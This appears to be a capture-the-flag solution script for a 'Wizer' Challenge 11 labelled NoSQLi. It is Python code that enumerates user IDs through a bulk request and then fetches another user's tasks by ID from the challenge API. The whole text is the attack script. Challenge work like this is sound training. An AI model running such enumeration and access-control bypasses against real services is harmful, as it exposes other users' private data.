Wizer - Challenge 11 - NoSQLi

Exploit

import requests

url = "https://chal11.vercel.app/api"


# Logged in as Dave Cohen (user-id:10024), you need to get Jeff Gonzales's Tasks


r = requests.post(url + "/users", json={
    "user_ids": [i for i in range(0,100_000)]
})


print(r.text)



r = requests.post(url + "/tasks", json={
    "user_id": "10028"
})


print(r.text)